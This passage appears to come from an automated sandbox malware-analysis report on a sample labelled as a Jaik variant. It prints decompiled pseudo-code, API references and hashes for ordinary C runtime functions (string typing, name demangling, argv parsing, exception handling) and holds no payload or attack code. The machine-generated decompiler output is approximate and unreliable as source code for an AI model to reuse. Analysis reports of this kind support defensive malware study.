				intOrPtr _v40;
				intOrPtr _v44;
				int _v48;
				char _v52;
				char _v68;
				signed int _t61;
				void* _t64;
				intOrPtr _t88;
				void* _t123;
				void* _t125;
				void* _t126;
				void* _t127;

				_t123 = __edi;
				L00976CC0(__ebx,  &_v68, __esi, _a4);
				if(_a24 == 0) {
					_v16 =  *((intOrPtr*)( *((intOrPtr*)(E00977A60( &_v68))) + 8));
				} else {
					_v16 = _a24;
				}
				_v28 = _v16;
				if(_a28 == 0) {
					_v20 = 1;
				} else {
					_v20 = 9;
				}
				_t61 = E009B0990(_v28, _v20, _a12, _a16, 0, 0);
				_t126 = _t125 + 0x18;
				_v12 = _t61;
				if(_v12 != 0) {
					_t64 = E009B5110(_v12 << 1);
					_t127 = _t126 + 4;
					if(_t64 == 0) {
						_v24 = 0;
					} else {
						_t88 = E009B5140(E00999580(E009B5110(_v12 << 1), 2, "minkernel\\crts\\ucrt\\src\\appcrt\\locale\\getstringtypea.cpp", 0x51), 0xdddd);
						_t127 = _t127 + 0x1c;
						_v24 = _t88;
					}
					E009B5090( &_v8,  *((intOrPtr*)(E009B50B0( &_v52, _v24))));
					if(E009B50F0( &_v8) != 0) {
						E0095AF80(_t123, E009B50F0( &_v8), 0, _v12 << 1);
						_v32 = E009B0990(_v28, 1, _a12, _a16, E009B50F0( &_v8), _v12);
						if(_v32 != 0) {
							_v48 = GetStringTypeW(_a8, E009B50F0( &_v8), _v32, _a20);
							E009B50D0( &_v8);
							E00977230( &_v68);
							return _v48;
						}
						_v44 = 0;
						E009B50D0( &_v8);
						E00977230( &_v68);
						return _v44;
					} else {
						_v40 = 0;
						E009B50D0( &_v8);
						E00977230( &_v68);
						return _v40;
					}
				} else {
					_v36 = 0;
					E00977230( &_v68);
					return _v36;
				}
			}























                      0x009b5170
                      0x009b517f
                      0x009b5188
                      0x009b519f
                      0x009b518a
                      0x009b518d
                      0x009b518d
                      0x009b51a5
                      0x009b51ac
                      0x009b51b7
                      0x009b51ae
                      0x009b51ae
                      0x009b51ae
                      0x009b51d2
                      0x009b51d7
                      0x009b51da
                      0x009b51e1
                      0x009b5200
                      0x009b5205
                      0x009b520a
                      0x009b523f
                      0x009b520c
                      0x009b5232
                      0x009b5237
                      0x009b523a
                      0x009b523a
                      0x009b5258
                      0x009b5267
                      0x009b5299
                      0x009b52c4
                      0x009b52cb
                      0x009b5304
                      0x009b530a
                      0x009b5312
                      0x00000000
                      0x009b5317
                      0x009b52cd
                      0x009b52d7
                      0x009b52df
                      0x00000000
                      0x009b5269
                      0x009b5269
                      0x009b5273
                      0x009b527b
                      0x00000000
                      0x009b5280
                      0x009b51e3
                      0x009b51e3
                      0x009b51ed
                      0x00000000
                      0x009b51f2

                      APIs
                      • __wcstombs_l.LIBCMTD ref: 009B5229
                      • __MarkAllocaS.LIBCMTD ref: 009B5232
                        • Part of subcall function 009B0990: MultiByteToWideChar.KERNEL32(00000000,CCCCCCCC,?,?,?,?,?,?,00000000,CCCCCCCC), ref: 009B09C3
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 009B524D
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 009B5258
                      • std::_Mutex::_Lock.LIBCPMTD ref: 009B5273
                      • std::_Mutex::_Lock.LIBCPMTD ref: 009B52D7
                      • GetStringTypeW.KERNEL32(?,00000000,00000000,00000001,?,?,?,?,?,?,?,?,00000000), ref: 009B52FE
                      • std::_Mutex::_Lock.LIBCPMTD ref: 009B530A
                      Strings
                      • minkernel\crts\ucrt\src\appcrt\locale\getstringtypea.cpp, xrefs: 009B5213
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: std::_$LockMutex::_$TimevecTimevec::_$AllocaByteCharMarkMultiStringTypeWide__wcstombs_l
                      • String ID: minkernel\crts\ucrt\src\appcrt\locale\getstringtypea.cpp
                      • API String ID: 2378836076-24854585
                      • Opcode ID: 775828fef2d66fb528209cdad5ca3c914b169c11522ee6ee529cbe87f7f7168a
                      • Instruction ID: a4adfea06b11e5348fb3e66a6c98cd0bf9dc8a32ac780dabaf0daeb8ffabd68b
                      • Opcode Fuzzy Hash: 775828fef2d66fb528209cdad5ca3c914b169c11522ee6ee529cbe87f7f7168a
                      • Instruction Fuzzy Hash: 58515E71D10608EFDB04EFA8CD96BEEB778AF94310F504118F516A7281EB74AE05CBA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00964380 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 96COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00964380(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				char _v40;
				char _v48;
				void* _t43;
				intOrPtr* _t56;
				intOrPtr _t58;
				intOrPtr _t70;
				intOrPtr _t71;

				E0095F2A0( &_v16, _a8);
				_t56 =  *0xb30640; // 0x0
				_v8 =  *_t56;
				if(_v8 == 0) {
					E0095FB00(__eflags, _a4, 1,  &_v16);
					return _a4;
				}
				if(_v8 == 0x3f) {
					_t58 =  *0xb30640; // 0x0
					 *0xb30640 = _t58 + 1;
					E0095F820( &_v16, E00963A20(__ebx, __edi, __esi,  &_v48,  &_v16, 0, E0095F3F0( &_v40), 0));
					E00966AB0(__ebx, __edi, __esi, _a4,  &_v16);
					return _a4;
				}
				if(_v8 == 0x58) {
					_t70 =  *0xb30640; // 0x0
					_t71 = _t70 + 1;
					 *0xb30640 = _t71;
					_t43 = E0096A560( &_v16);
					__eflags = _t43;
					if(_t43 == 0) {
						_v32 = E00960060("void ", 5);
						_v28 = _t71;
						E0095FAA0(_a4,  &_v32,  &_v16);
						return _a4;
					}
					_v24 = E00960060("void", 4);
					_v20 = _t71;
					E0095F1F0(_a4,  &_v24);
					return _a4;
				}
				E00966AB0(__ebx, __edi, __esi, _a4,  &_v16);
				return _a4;
			}
















                      0x0096438d
                      0x00964392
                      0x0096439a
                      0x009643a1
                      0x009643c2
                      0x00000000
                      0x009643ca
                      0x009643a7
                      0x00964446
                      0x0096444f
                      0x00964476
                      0x00964483
                      0x00000000
                      0x0096448b
                      0x009643b1
                      0x009643d2
                      0x009643d8
                      0x009643db
                      0x009643e4
                      0x009643e9
                      0x009643eb
                      0x00964427
                      0x0096442a
                      0x00964439
                      0x00000000
                      0x00964441
                      0x009643fc
                      0x009643ff
                      0x00964409
                      0x00000000
                      0x0096440e
                      0x009644a9
                      0x00000000

                      APIs
                      • DName::DName.LIBVCRUNTIMED ref: 0096438D
                        • Part of subcall function 0095F2A0: pDNameNode::pDNameNode.LIBCMTD ref: 0095F2DA
                      • operator+.LIBVCRUNTIMED ref: 009643C2
                      • DName::isEmpty.LIBCMTD ref: 009643E4
                        • Part of subcall function 00966AB0: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00966AB9
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 0096445A
                      • Mailbox.LIBCMTD ref: 00964476
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Name$Iterator_baseIterator_base::_std::_$EmptyMailboxName::Name::isNodeNode::poperator+
                      • String ID: X$void$void
                      • API String ID: 3628514644-1260697050
                      • Opcode ID: 619d7217a01d1eae1899f7dffd11306c9cf23c00e296c7519f2e409d41093a1e
                      • Instruction ID: c46678aa62faa5e63056956b7f76b94b2d1ee631019e9658289ecaa04c2c455e
                      • Opcode Fuzzy Hash: 619d7217a01d1eae1899f7dffd11306c9cf23c00e296c7519f2e409d41093a1e
                      • Instruction Fuzzy Hash: 553154B5D54108ABDB04EFD4DC92BEE77B8AF84304F14C155F90967252EB34AB18CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00969D50 Relevance: 15.1, APIs: 10, Instructions: 130COMMON
                      Download Yara Rule
                      C-Code - Quality: 82%
                      			E00969D50(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v5;
				char _v12;
				char _v20;
				char _v28;
				char _v36;
				char _v44;
				char _v52;
				char _v60;
				char* _t38;
				void* _t51;
				char* _t88;
				void* _t96;
				void* _t97;

				_t95 = __esi;
				_t94 = __edi;
				_t65 = __ebx;
				_t38 =  *0xb30640; // 0x0
				if( *_t38 != 0) {
					E00968D00(__ebx, __edi, __esi,  &_v20);
					_t97 = _t96 + 4;
					if(E0096A6C0( &_v20) != 0) {
						E0095FDE0( &_v20, 0x7b);
						_v5 = 0;
						L5:
						while(1 != 0) {
							if((_v5 & 0x000000ff) != 0) {
								E0095FDE0( &_v20, 0x2c);
							}
							_t88 =  *0xb30640; // 0x0
							_v12 =  *_t88;
							_v12 = _v12 - 0x32;
							if(_v12 > 0xe) {
								L14:
								E0095FD40( &_v20, E00968D00(_t65, _t94, _t95,  &_v52));
								E0095FDE0( &_v20, 0x3a);
								_t51 = E009686C0(_t65, _t94, _t95,  &_v60);
								_t97 = _t97 + 8;
								E0095FD40( &_v20, _t51);
								goto L15;
							} else {
								_t16 = _v12 + 0x969f18; // 0xcccccc03
								switch( *((intOrPtr*)(( *_t16 & 0x000000ff) * 4 +  &M00969F04))) {
									case 0:
										 *0xb30640 =  *0xb30640 + 1;
										_t58 = E00969D50(_t65, _t94, _t95,  &_v28);
										_t97 = _t97 + 4;
										E0095FD40( &_v20, _t58);
										goto L15;
									case 1:
										 *0xb30640 =  *0xb30640 + 1;
										 *0xb30640 =  *0xb30640 + 1;
										__ecx =  &_v36;
										__eax = E00962860(__ebx, __edi, __esi,  &_v36);
										__ecx =  &_v20;
										__eax = E0095FD40(__ecx, __eax);
										goto L15;
									case 2:
										 *0xb30640 =  *0xb30640 + 1;
										 &_v44 = E009680D0(__ebx, __edi, __esi,  &_v44);
										__ecx =  &_v20;
										__eax = E0095FD40(__ecx, __eax);
										goto L15;
									case 3:
										L15:
										if(E0096A6C0( &_v20) != 0) {
											_t54 =  *0xb30640; // 0x0
											if( *_t54 != 0x40) {
												_v5 = 1;
												goto L5;
											}
											_t90 =  *0xb30640; // 0x0
											 *0xb30640 = _t90 + 1;
											goto L20;
										}
										E0095F350(_a4, 2);
										return _a4;
									case 4:
										goto L14;
								}
							}
						}
						L20:
						E0095FDE0( &_v20, 0x7d);
						E0095F240(_a4,  &_v20);
						return _a4;
					}
					E0095F350(_a4, 2);
					return _a4;
				}
				E0095F350(_a4, 1);
				return _a4;
			}
















                      0x00969d50
                      0x00969d50
                      0x00969d50
                      0x00969d56
                      0x00969d60
                      0x00969d78
                      0x00969d7d
                      0x00969d8a
                      0x00969da3
                      0x00969da8
                      0x00000000
                      0x00969dac
                      0x00969dbf
                      0x00969dc6
                      0x00969dc6
                      0x00969dcb
                      0x00969dd4
                      0x00969ddd
                      0x00969de4
                      0x00969e70
                      0x00969e80
                      0x00969e8a
                      0x00969e93
                      0x00969e98
                      0x00969e9f
                      0x00000000
                      0x00969dea
                      0x00969ded
                      0x00969df4
                      0x00000000
                      0x00969e04
                      0x00969e0e
                      0x00969e13
                      0x00969e1a
                      0x00000000
                      0x00000000
                      0x00969e29
                      0x00969e2c
                      0x00969e31
                      0x00969e35
                      0x00969e3e
                      0x00969e41
                      0x00000000
                      0x00000000
                      0x00969e51
                      0x00969e5b
                      0x00969e64
                      0x00969e67
                      0x00000000
                      0x00000000
                      0x00969ea4
                      0x00969eae
                      0x00969ebf
                      0x00969eca
                      0x00969edd
                      0x00000000
                      0x00969edd
                      0x00969ecc
                      0x00969ed5
                      0x00000000
                      0x00969ed5
                      0x00969eb5
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00969df4
                      0x00969de4
                      0x00969ee6
                      0x00969eeb
                      0x00969ef7
                      0x00000000
                      0x00969efc
                      0x00969d91
                      0x00000000
                      0x00969d96
                      0x00969d67
                      0x00000000

                      APIs
                      • DName::DName.LIBVCRUNTIMED ref: 00969D67
                        • Part of subcall function 0095F350: DNameStatusNode::make.LIBVCRUNTIMED ref: 0095F3AE
                      • DName::isValid.LIBCMTD ref: 00969D83
                      • DName::DName.LIBVCRUNTIMED ref: 00969D91
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Name$Name::$Name::isNode::makeStatusValid
                      • String ID:
                      • API String ID: 4056879799-0
                      • Opcode ID: 5c9da991224096a5c123d39ff7e5646128f59f4453c9e12698e9b49f25f51bf7
                      • Instruction ID: d07c833a0b3ee9a9ef3de0a6f770572c82b80d9b25ed7edcdb40caa1ec4e5088
                      • Opcode Fuzzy Hash: 5c9da991224096a5c123d39ff7e5646128f59f4453c9e12698e9b49f25f51bf7
                      • Instruction Fuzzy Hash: DF4190B09141189BDB05EF60DCA6BFE7778BF90345F140529E8065B1D6EF36AA08CB81
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0099A760 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 198COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 92%
                      			E0099A760(void* __ecx, void* __edi, intOrPtr _a4) {
				char _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				signed int _v76;
				intOrPtr _v80;
				char _v84;
				signed char _t84;
				intOrPtr _t97;
				intOrPtr _t105;
				char* _t112;
				void* _t116;
				void* _t118;
				void* _t156;
				void* _t159;

				_t156 = __edi;
				_t118 = __ecx;
				if(_a4 != 0) {
					__eflags = _a4 - 2;
					if(_a4 == 2) {
						L5:
						_v28 = 1;
						L6:
						_v32 = _v28;
						__eflags = _v32;
						if(__eflags == 0) {
							_t116 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\startup\\argv_parsing.cpp", 0x14a, 0, L"%ls", L"mode == _crt_argv_expanded_arguments || mode == _crt_argv_unexpanded_arguments");
							_t159 = _t159 + 0x18;
							__eflags = _t116 - 1;
							if(_t116 == 1) {
								asm("int3");
							}
						}
						__eflags = _v32;
						if(_v32 != 0) {
							_push(0);
							E0099B670();
							_v52 = 0x104;
							_v56 = 0;
							E0099ACA0( &_v56, "C:\Users\hardz\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exe",  &_v52);
							_v60 = 0xb30718;
							E0099B3E0( &_v60);
							_push(0);
							_v20 = E0099B770();
							__eflags = _v20;
							if(_v20 == 0) {
								L14:
								_v36 = 0xb30718;
								L15:
								_v40 = _v36;
								_v12 = 0;
								_v24 = 0;
								E0099ACE0(_v40, 0, 0,  &_v12,  &_v24);
								E0099B460( &_v8, E0099B890(_t156, _v12, _v24, 1));
								_t84 = E0099B520( &_v8);
								__eflags = _t84 & 0x000000ff;
								if((_t84 & 0x000000ff) != 0) {
									_v44 = E0099B6D0( &_v8);
									_v68 = E0099B6D0( &_v8) + _v12 * 4;
									E0099ACE0(_v40, _v44, _v68,  &_v12,  &_v24);
									__eflags = _a4 - 1;
									if(_a4 != 1) {
										E0099B480( &_v16, 0);
										_v48 = E0099B690(_v44, E0099B730( &_v16));
										__eflags = _v48;
										if(_v48 == 0) {
											 *0xb3153c = E0099B590(E0099B440( &_v84,  &_v16));
											_t97 = E0099B610( &_v16);
											_push(0);
											 *((intOrPtr*)(E0099B750())) = _t97;
											_v80 = 0;
											E0099B4E0( &_v16);
											E0099B4C0( &_v8);
											return _v80;
										}
										_v76 = _v48;
										E0099B4E0( &_v16);
										E0099B4C0( &_v8);
										return _v76;
									}
									 *0xb3153c = _v12 - 1;
									_t105 = E0099B5E0( &_v8);
									_push(0);
									 *((intOrPtr*)(E0099B750())) = _t105;
									_v72 = 0;
									E0099B4C0( &_v8);
									return _v72;
								}
								 *((intOrPtr*)(L00992F70( &_v8))) = 0xc;
								_v64 = 0xc;
								E0099B4C0( &_v8);
								return _v64;
							}
							_t112 = _v20;
							__eflags =  *_t112;
							if( *_t112 == 0) {
								goto L14;
							}
							_v36 = _v20;
							goto L15;
						} else {
							 *((intOrPtr*)(L00992F70(_t118))) = 0x16;
							E00992900(L"mode == _crt_argv_expanded_arguments || mode == _crt_argv_unexpanded_arguments", L"common_configure_argv", L"minkernel\\crts\\ucrt\\src\\appcrt\\startup\\argv_parsing.cpp", 0x14a, 0);
							return 0x16;
						}
					}
					__eflags = _a4 - 1;
					if(_a4 == 1) {
						goto L5;
					}
					_v28 = 0;
					goto L6;
				}
				return 0;
			}































                      0x0099a760
                      0x0099a760
                      0x0099a76d
                      0x0099a776
                      0x0099a77a
                      0x0099a78b
                      0x0099a78b
                      0x0099a792
                      0x0099a795
                      0x0099a798
                      0x0099a79c
                      0x0099a7b6
                      0x0099a7bb
                      0x0099a7be
                      0x0099a7c1
                      0x0099a7c3
                      0x0099a7c3
                      0x0099a7c1
                      0x0099a7c4
                      0x0099a7c8
                      0x0099a7fd
                      0x0099a7ff
                      0x0099a807
                      0x0099a80e
                      0x0099a822
                      0x0099a838
                      0x0099a83f
                      0x0099a847
                      0x0099a851
                      0x0099a854
                      0x0099a858
                      0x0099a875
                      0x0099a875
                      0x0099a87c
                      0x0099a87f
                      0x0099a882
                      0x0099a889
                      0x0099a8a0
                      0x0099a8be
                      0x0099a8c6
                      0x0099a8ce
                      0x0099a8d0
                      0x0099a8fc
                      0x0099a90d
                      0x0099a924
                      0x0099a92c
                      0x0099a930
                      0x0099a970
                      0x0099a98a
                      0x0099a98d
                      0x0099a991
                      0x0099a9c1
                      0x0099a9c9
                      0x0099a9d0
                      0x0099a9da
                      0x0099a9dc
                      0x0099a9e6
                      0x0099a9ee
                      0x00000000
                      0x0099a9f3
                      0x0099a996
                      0x0099a99c
                      0x0099a9a4
                      0x00000000
                      0x0099a9a9
                      0x0099a938
                      0x0099a941
                      0x0099a948
                      0x0099a952
                      0x0099a954
                      0x0099a95e
                      0x00000000
                      0x0099a963
                      0x0099a8d7
                      0x0099a8dd
                      0x0099a8e7
                      0x00000000
                      0x0099a8ec
                      0x0099a862
                      0x0099a869
                      0x0099a86b
                      0x00000000
                      0x00000000
                      0x0099a870
                      0x00000000
                      0x0099a7ca
                      0x0099a7cf
                      0x0099a7eb
                      0x00000000
                      0x0099a7f3
                      0x0099a7c8
                      0x0099a77c
                      0x0099a780
                      0x00000000
                      0x00000000
                      0x0099a782
                      0x00000000
                      0x0099a782
                      0x00000000

                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: %ls$C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exe$common_configure_argv$minkernel\crts\ucrt\src\appcrt\startup\argv_parsing.cpp$mode == _crt_argv_expanded_arguments || mode == _crt_argv_unexpanded_arguments
                      • API String ID: 0-1997232450
                      • Opcode ID: 307edc8588b8f005f1b6fc5241de793c70e29a9a94529e16d947927f3abef797
                      • Instruction ID: a2bf5189a0787c1f7b34360edd3fa09d3523566226fa6095389e8dc1b6becda3
                      • Opcode Fuzzy Hash: 307edc8588b8f005f1b6fc5241de793c70e29a9a94529e16d947927f3abef797
                      • Instruction Fuzzy Hash: DE7131B1D0020CEBDF04EF98D986BEE77B8EF94704F104559E1056B291EB796E44CB92
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0095D500 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 153COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 83%
                      			E0095D500(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, signed int _a32) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v28;
				void* _t75;
				void* _t76;
				signed char _t77;
				void* _t80;
				void* _t87;
				signed char _t88;
				void* _t126;
				void* _t127;
				void* _t130;
				void* _t131;

				_t125 = __esi;
				_t124 = __edi;
				_t91 = __ecx;
				_t90 = __ebx;
				E0095E290(__ecx, _a12);
				_t127 = _t126 + 4;
				if( *((intOrPtr*)(E0095C670(__ebx, _t91, __edi, __esi) + 0x20)) != 0 ||  *_a4 == 0xe06d7363 ||  *_a4 == 0x80000026) {
					L6:
					if(( *(_a4 + 4) & 0x00000066) == 0) {
						E0095D6F0( &_v28, _a20, 0);
						if(E0095E140( &_v28) != 0) {
							L16:
							if( *_a4 != 0xe06d7363 ||  *((intOrPtr*)(_a4 + 0x10)) < 3 ||  *((intOrPtr*)(_a4 + 0x14)) <= 0x19930522) {
								L21:
								E0095CD60(_t90, _t124, _t125, _a4, _a8, _a12, _a16, _a20, _a32 & 0x000000ff, _a24, _a28);
								L22:
								return 1;
							} else {
								_v8 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x1c)) + 8));
								if(_v8 == 0) {
									goto L21;
								}
								_v16 = _v8;
								_v12 = _v16;
								 *0x9d62b0(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32 & 0x000000ff);
								_v20 = _v12();
								return _v20;
							}
						}
						_t75 = E0095E130(_a20);
						_t130 = _t127 + 4;
						if(_t75 < 0x19930521) {
							L14:
							_t106 = _a20;
							_t76 = E0095E130(_a20);
							_t131 = _t130 + 4;
							if(_t76 < 0x19930522) {
								goto L22;
							}
							_t77 = E0095E190(_t106, _a20);
							_t127 = _t131 + 4;
							if((_t77 & 0x000000ff) == 0) {
								goto L22;
							}
							goto L16;
						}
						_t80 = E0095E100(_a20);
						_t127 = _t130 + 4;
						if(_t80 != 0) {
							goto L16;
						}
						goto L14;
					}
					if(L0095DF10(_a16, _a20) != 0 && _a24 == 0) {
						E0095DD70(_a8, _a16, _a20);
					}
					return 1;
				} else {
					_t87 = E0095E130(_a20);
					_t127 = _t127 + 4;
					if(_t87 < 0x19930522) {
						goto L6;
					}
					_t88 = E0095E160(_a20, _a20);
					_t127 = _t127 + 4;
					if((_t88 & 0x000000ff) == 0) {
						goto L6;
					}
					return 1;
				}
			}


















                      0x0095d500
                      0x0095d500
                      0x0095d500
                      0x0095d500
                      0x0095d50a
                      0x0095d50f
                      0x0095d51b
                      0x0095d563
                      0x0095d56c
                      0x0095d5af
                      0x0095d5be
                      0x0095d611
                      0x0095d61a
                      0x0095d687
                      0x0095d6a8
                      0x0095d6b0
                      0x00000000
                      0x0095d631
                      0x0095d63a
                      0x0095d641
                      0x00000000
                      0x00000000
                      0x0095d646
                      0x0095d66d
                      0x0095d673
                      0x0095d67f
                      0x00000000
                      0x0095d682
                      0x0095d61a
                      0x0095d5c4
                      0x0095d5c9
                      0x0095d5d1
                      0x0095d5e3
                      0x0095d5e3
                      0x0095d5e7
                      0x0095d5ec
                      0x0095d5f4
                      0x00000000
                      0x00000000
                      0x0095d5fe
                      0x0095d603
                      0x0095d60b
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0095d60b
                      0x0095d5d7
                      0x0095d5dc
                      0x0095d5e1
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0095d5e1
                      0x0095d580
                      0x0095d594
                      0x0095d599
                      0x00000000
                      0x0095d533
                      0x0095d537
                      0x0095d53c
                      0x0095d544
                      0x00000000
                      0x00000000
                      0x0095d54a
                      0x0095d54f
                      0x0095d557
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0095d559

                      APIs
                      • ___except_validate_context_record.LIBVCRUNTIMED ref: 0095D50A
                        • Part of subcall function 0095E290: __guard_icall_checks_enforced.LIBCMTD ref: 0095E296
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 0095D512
                      • __FrameHandler3::isEHs.LIBVCRUNTIMED ref: 0095D54A
                      • __FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIMED ref: 0095D594
                      • _Smanip.LIBCPMTD ref: 0095D5AF
                      • __FrameHandler3::isNoExcept.LIBVCRUNTIMED ref: 0095D5FE
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Frame$Handler3::is$EmptyExceptHandler3::SmanipStateUnwind___except_validate_context_record___vcrt_getptd__guard_icall_checks_enforced
                      • String ID: csm$csm
                      • API String ID: 2671830719-3733052814
                      • Opcode ID: dcdc720e0a52286f8c7bdf5c390408315b3444933772a82f5f6f4af3ef98bf9c
                      • Instruction ID: 6899933bd35c6f115e24e891f7a182e5c924938c979ef8e4e73da7b40304ad27
